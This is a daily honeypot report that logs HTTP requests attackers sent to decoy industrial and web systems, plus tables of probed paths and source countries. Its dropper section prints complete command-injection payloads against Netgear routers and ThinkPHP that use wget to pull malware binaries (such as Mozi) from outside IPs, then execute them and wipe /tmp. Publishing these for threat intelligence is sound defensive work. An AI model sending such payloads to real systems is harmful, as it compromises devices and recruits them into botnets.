Skip to main content
  1. Daily-Posts/

Report: 2025-03-31

·1556 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-03-31
#

Interaction report on http service of various honeypot around the world.

ot_simplified_report
#

Simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
DEGermany
SCSingapore
SGSingapore
MYAustralia
GBDubai
USDubai
GBGeorgia
CNGeorgia
MY
CA
US

botnet_dropper_behaviour
#

List of requests suspected of having stage 1 dropper behavior (programs designed to extract other files from their own code).

remote_addrrequest
27.43.204.223GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
223.109.64.180GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://102.33.18.208:37747/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
141.98.11.210POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20arm7 HTTP/1.1
220.179.1.88GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
1.170.222.168GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
175.182.207.63GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
117.135.239.172GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
123.240.58.26GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
140.207.30.37GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
106.105.231.176GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
14.103.164.141GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://213.209.129.92/Yboats.x86 -O /tmp/.YBot; chmod 777 /tmp/.YBot; /tmp/.YBot thinkphp.selfrep’ HTTP/1.1
49.143.97.135GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
58.242.106.187GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
186.29.199.182GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
123.241.190.219GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
123.195.84.162GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
36.226.193.153GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
1.165.21.84GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1

request
#

List of requests of the day that have never been detected, other requests that have already been detected and archived in the request database..

number_of_occurencerequest
1516GET /kai.html HTTP/1.1
2145GET /tt/mips HTTP/1.1
2155GET /vv/arc HTTP/1.1
2165GET /vv/riscv32 HTTP/1.1
2175GET /vv/sh4 HTTP/1.1
2185GET /tt/sh4 HTTP/1.1
2195GET /vv/mips HTTP/1.1
2205GET /ee/armv4eb HTTP/1.1
2215GET /ee/armv5l HTTP/1.1
2225GET /x86_32.nn HTTP/1.1
2235GET /sparc.nn HTTP/1.1
2245GET /mipsel.nn HTTP/1.1
2255GET /arm.nn HTTP/1.1
2265GET /t/mips HTTP/1.1
3555GET /splarm HTTP/1.1
3695GET /splsh4 HTTP/1.1
3705GET /splppc HTTP/1.1
3715GET /LjEZs/uYtea.spc HTTP/1.1
3725GET /LjEZs/uYtea.arm HTTP/1.1
3735GET /jklspc HTTP/1.1
3905GET /tsh4 HTTP/1.1
3915GET /x86_64 HTTP/1.1
3944GET /debug.dbg HTTP/1.1
3964GET /hidakibest.arm5 HTTP/1.1
3974GET /yakuza.mips HTTP/1.1
3994GET /vv/powerpc HTTP/1.1
4014GET /tt/i686 HTTP/1.1
4024GET /jklx86 HTTP/1.1
4034GET /nabarm6 HTTP/1.1
4044GET /mips.nn HTTP/1.1
4074GET /x86 HTTP/1.1
4094GET /LjEZs/uYtea.x86 HTTP/1.1
4113GET /tt/powerpc HTTP/1.1
4143GET /hidakibest.sparc HTTP/1.1
4163GET /hidakibest.arm4 HTTP/1.1
4173GET /tt/mipsel HTTP/1.1
4183GET /x86_64.nn HTTP/1.1
4193GET /vv/sparc HTTP/1.1
4233GET /tt/mips64 HTTP/1.1
4243GET /tt/sparc HTTP/1.1
4253GET /hidakibest.mips HTTP/1.1
4263GET /hidakibest.mpsl HTTP/1.1
4273GET /hidakibest.arm6 HTTP/1.1
4283GET /tt/armv5l HTTP/1.1
4293GET /arm5.nn HTTP/1.1
4333GET /vv/mips64 HTTP/1.1
4343GET /tmips HTTP/1.1
4353GET /vv/armv4l HTTP/1.1
4393GET /m-6.8-k.Sakura HTTP/1.1
4423GET /yakuza.x86 HTTP/1.1
4433GET /yakuza.arm6 HTTP/1.1
4513GET /vv/armv5l HTTP/1.1
4533GET /powerpc.nn HTTP/1.1
4543GET /nabarm7 HTTP/1.1
4553GET /splarm5 HTTP/1.1
4563GET /splmpsl HTTP/1.1
4573GET /LjEZs/uYtea.x86_64 HTTP/1.1
4583GET /LjEZs/uYtea.arc HTTP/1.1
4593GET /aarch64 HTTP/1.1
4603GET /splm68k HTTP/1.1
4623GET /hidakibest.x86 HTTP/1.1
4643GET /vv/mipsel HTTP/1.1
4653GET /vv/i686 HTTP/1.1
4663GET /tt/riscv32 HTTP/1.1
4673GET /tarm5 HTTP/1.1
4693GET /hiddenbin/boatnet.spc HTTP/1.1
4703GET /main_mips HTTP/1.1
4713GET /main_arm6 HTTP/1.1
4723GET /t/arm7 HTTP/1.1
4733GET /main_x86_64 HTTP/1.1
4752GET /tt/mipsel64 HTTP/1.1
4802GET /tt/arc HTTP/1.1
4812GET /tt/armv4l HTTP/1.1
4822GET /tt/armv6l HTTP/1.1
4832GET /vv/armv7l HTTP/1.1
4842GET /ee/armv6l HTTP/1.1
4892GET /tarm HTTP/1.1
4902GET /tmpsl HTTP/1.1
4912GET /tarm7 HTTP/1.1
4952GET /vv/armv6l HTTP/1.1
4962GET /vv/armv4eb HTTP/1.1
4972GET /ee/armv4l HTTP/1.1
4982GET /ee/armv7l HTTP/1.1
4992GET /tt/armv7l HTTP/1.1
5002GET /tt/armv4eb HTTP/1.1
5012GET /t/arm5 HTTP/1.1
5022GET /t/aarch64 HTTP/1.1
5032GET /sh4 HTTP/1.1
5092GET /mipsel HTTP/1.1
5102GET /dss HTTP/1.1
5122GET /hidakibest.ppc HTTP/1.1
5132GET /yakuza.arm4 HTTP/1.1
5142GET /yakuza.i586 HTTP/1.1
5152GET /Mozi.m HTTP/1.1
5162GET /sparc HTTP/1.1
5172GET /yakuza.m68k HTTP/1.1
5202GET /yakuza.ppc HTTP/1.1
5212GET /sh4.nn HTTP/1.1
5232GET /arm6 HTTP/1.1
5252GET /arm5 HTTP/1.1
5262GET /m68k HTTP/1.1
5272GET /i686 HTTP/1.1
5292GET /arm7 HTTP/1.1
5302GET /arc HTTP/1.1
5312GET /arm HTTP/1.1
5322GET /spc HTTP/1.1
5332GET /jklppc HTTP/1.1
5342GET /splmips HTTP/1.1
5352GET /nabarm5 HTTP/1.1
5362GET /jklsh4 HTTP/1.1
5372GET /nabmips HTTP/1.1
5382GET /LjEZs/uYtea.arm5 HTTP/1.1
5392GET /main_sh4 HTTP/1.1
5402GET /main_arm7 HTTP/1.1
5412GET /main_ppc HTTP/1.1
5422GET /LjEZs/uYtea.sh4 HTTP/1.1
5432GET /LjEZs/uYtea.mpsl HTTP/1.1
5442GET /LjEZs/uYtea.ppc HTTP/1.1
5452GET /LjEZs/uYtea.arm6 HTTP/1.1
5462GET /LjEZs/uYtea.m68k HTTP/1.1
5472GET /LjEZs/uYtea.arm7 HTTP/1.1
5482GET /bins/arc HTTP/1.1
5492GET /bins/arm6 HTTP/1.1
5502GET /bins/mpsl HTTP/1.1
5512GET /bins/ppc HTTP/1.1
5522GET /miner HTTP/1.1
5532GET /gif HTTP/1.1
5542GET /main_x86 HTTP/1.1
5552GET /main_m68k HTTP/1.1
5562GET /main_arm HTTP/1.1
5572GET /main_arm5 HTTP/1.1
5582GET /zd/arm5 HTTP/1.1
5592GET /zd/ppc HTTP/1.1
5602GET /t/mpsl HTTP/1.1
5612GET /ppc HTTP/1.1
5622GET /t/sh4 HTTP/1.1
5632GET /t/arm HTTP/1.1
5642GET /t/arm6 HTTP/1.1
5652GET /zd/spc HTTP/1.1
5662GET /zd/arm6 HTTP/1.1
5672GET /zd/arm HTTP/1.1
5682GET /zd/mpsl HTTP/1.1
5702GET /sshd HTTP/1.1
5722GET /bins/m68k HTTP/1.1
5752GET /i HTTP/1.1
5762GET /bin.sh HTTP/1.1
5882GET /old.env HTTP/1.1
5932GET /zd/sh4 HTTP/1.1
6092GET /App/.env HTTP/1.1
6192GET /hiddenbin/boatnet.m68k HTTP/1.1
6311GET /NmapUpperCheck1743379778 HTTP/1.1
6321GET /bzK5 HTTP/1.1
6331GET /rest/applinks/1.0/manifest HTTP/1.1
6341GET /Nmap/folder/check1743379778 HTTP/1.1
6731\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4f\xB2M\xD8n\xCD)\xB5\x05\x02\x00\x01\x00\x00\xA1\xAA
6881GET /metadata HTTP/1.1
6891GET /baseR2/metadata HTTP/1.1
6901GET /baseDstu3/metadata HTTP/1.1
6911GET /baseDstu2/metadata HTTP/1.1
6921GET /baseR5/metadata HTTP/1.1
6931\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB47\xB7\xC0-\xC7\xAF\xC9\xFB\x05\x02\x00\x01\x00\x00\xA1\xAA
7011\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\x0F+\xA0\x8F\xC2\x03\xB8/\x05\x02\x00\x01\x00\x00\xA1\xAA
7151GET /baseR4/metadata HTTP/1.1
7161GET /r2/metadata HTTP/1.1
7171GET /r4/metadata HTTP/1.1
7181GET /baseR3/metadata HTTP/1.1
7191GET /fhir/metadata HTTP/1.1
7261GET /r3/metadata HTTP/1.1
7271GET /r5/metadata HTTP/1.1
7281GET /fhir-server/api/v4/metadata HTTP/1.1
7301\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\xD9\xF6L\xC4\xCE$\x90\xDC\x05\x02\x00\x01\x00\x00\xA1\xAA
7521GET /zd/arc HTTP/1.1
7531GET /zd/arm7 HTTP/1.1
7541GET /zd/mips HTTP/1.1
7551GET /zd/m68k HTTP/1.1
7561GET /bins/sh4 HTTP/1.1
7571GET /bins/arm7 HTTP/1.1
7831GET /zd/i686 HTTP/1.1
7951GET /bins/mips HTTP/1.1
7961GET /bins/x86 HTTP/1.1
7971GET /bins/spc HTTP/1.1
7981GET /main_mpsl HTTP/1.1
7991GET /zd/aarch64 HTTP/1.1
8001GET /nabx86 HTTP/1.1
8011GET /nabppc HTTP/1.1
8021GET /nabm68k HTTP/1.1
8031GET /splarm7 HTTP/1.1
8041GET /nabmpsl HTTP/1.1
8051GET /splx86 HTTP/1.1
8061GET /jklm68k HTTP/1.1
8071GET /zerarm7 HTTP/1.1
8091GET /bins/arm5 HTTP/1.1
8101GET /bins/arm HTTP/1.1
8321GET /NmapUpperCheck1743418291 HTTP/1.1
8431GET /nabarm HTTP/1.1
8441GET /mips HTTP/1.1
8451GET /mpsl HTTP/1.1
8461GET /LjEZs/uYtea.mips HTTP/1.1
8471GET /nabsh4 HTTP/1.1
8481GET /arm7.nn HTTP/1.1
8631GET /1Wsa HTTP/1.1
8671GET /Nmap/folder/check1743418291 HTTP/1.1
8781GET /t/ppc HTTP/1.1
8941GET /nmaplowercheck1743418291 HTTP/1.1
9131GET /nmaplowercheck1743379778 HTTP/1.1
9281CNXN\x00\x00\x00\x01\x00\x00\x04\x00\x1B\x00\x00\x00M

country_iso_code
#

List of country names and number of requests received by IPs located in these countries.

number_of_occurencecountry_iso_code
01639NL
1659GB
2451BG
3336MY
4329US
5249DE
6233SC
7204SG
8132HK
9111TW
1093CN
1172PL
1245IR
1327CA
1418NG
1511RU
169BE
178BR
188IN
197JP
207MA
216FR
226IT
235PT
244TR
254KR
264LT
274SA
284ID
293GH
303AO
312MC
322AZ
332CH
342UA
352CZ
362CO
371AU
381SE
391PA
401ES
411GR
421AR
431MX
441VN
451AE

Related

Report: 2025-03-30
·466 words
Repport Daily
Report: 2025-03-29
·486 words
Repport Daily
Report: 2025-03-28
·589 words
Repport Daily